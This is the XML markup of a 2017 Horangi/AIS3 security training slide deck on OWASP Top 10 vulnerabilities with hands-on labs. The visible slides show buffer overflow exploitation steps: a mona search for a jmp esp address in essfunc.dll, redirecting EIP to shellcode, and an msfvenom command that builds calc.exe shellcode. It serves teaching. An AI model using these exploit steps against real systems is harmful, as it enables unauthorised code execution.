              <a:t>\xe4” xxxx.dll OR !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> find -s "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>\xe4" -m essfunc.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Redirect EIP to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to lead execution to shellcode. Check that code flow reaches there. (F2 breakpoint, F7 to resume)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to generate shellcode, and remove bad characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/exec CMD=calc.exe --smallest -f python -v payload -b '\x00'Note shell code length, add NOPs in this situation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1083930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Shape 642"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9130472" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="1416049" cy="538981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450437" y="1882081"/>
            <a:ext cx="8229600" cy="1379400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="9000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Let’s go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4291584"/>
            <a:ext cx="8229600" cy="475678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>August/Sept 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>AIS3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Taiwan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="8229600" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328712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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="776200"/>
            <a:ext cx="8098800" cy="3488100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Panama Papers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Shape 35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53" name="Shape 353"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287225" y="77612"/>
            <a:ext cx="3592974" cy="4244299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277200" y="711981"/>
            <a:ext cx="4017050" cy="2051574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="458575" y="3061825"/>
            <a:ext cx="2721200" cy="1530675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3223650" y="2377399"/>
            <a:ext cx="2871675" cy="24759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4">
      <a:dk1>
        <a:srgbClr val="20252D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3A5269"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D1D1D1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B6C0C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B45D24"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="9BBB59"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8064A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BACC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F79646"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="1F497D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="1F49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4">
      <a:dk1>
        <a:srgbClr val="20252D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3A5269"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D1D1D1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B6C0C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B45D24"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="9BBB59"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8064A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BACC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F79646"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="1F497D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="1F49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4">
      <a:dk1>
        <a:srgbClr val="20252D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3A5269"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D1D1D1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B6C0C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B45D24"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="9BBB59"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8064A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BACC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F79646"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="1F497D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="1F49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2242</TotalTime>
  <Words>3872</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>359</Paragraphs>
  <Slides>71</Slides>
  <Notes>70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71</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>medium-content-serif-font</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Malgun Gothic</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Lora</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction.</vt:lpstr>
      <vt:lpstr>Introduction.</vt:lpstr>
      <vt:lpstr>Agenda.</vt:lpstr>
      <vt:lpstr>Vulnerabilities And Why They Matter Web Apps - OWASP Top 10 Vulnerabilities (Part 1) Web Apps - OWASP Top 10 Vulnerabilities (Part 2) Special Mention: Buffer Overflow</vt:lpstr>
      <vt:lpstr>Top Web Vulnerabilities Today?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Injection. Panama Papers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Broken Authentication and Session Management. US Department of Revenue</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS). Steam Profile Pages </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References. SnapchatDB leak</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security Misconfiguration. Various, CloudPets, Mirai(未来)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security Misconfiguration. Special mention: AWS S3</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>bWAPP Hands On Part 1.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>BREAK TIME!</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure. “Cloudbleed”</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Missing Function Level Access Control Facebook Business Pages </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF) Incheon</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Using Components with Known Vulnerabilities WordPress REST API (Jan 2017)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects and Forwards  Amazon Simple Storage Service (S3)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>New Threats Since Then</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security in the development lifecycle</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>System Hardening</vt:lpstr>
      <vt:lpstr>Sometimes we face cybersecurity issues as stakeholders don’t understand the issues</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>But users have to be able to make smart decisions too</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>bWAPP Hands On Part 2.</vt:lpstr>
      <vt:lpstr>BREAK TIME!</vt:lpstr>
      <vt:lpstr>Bonus: Web Thickclient Buffer Overflow</vt:lpstr>
      <vt:lpstr>What is Buffer Overflow? Demonstration with Metasploit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Lim Quan Heng</dc:creator>
  <cp:lastModifiedBy>Lim Quan Heng</cp:lastModifiedBy>
  <cp:revision>124</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-27T12:19:37Z</dcterms:modified>
</cp:coreProperties>
</file>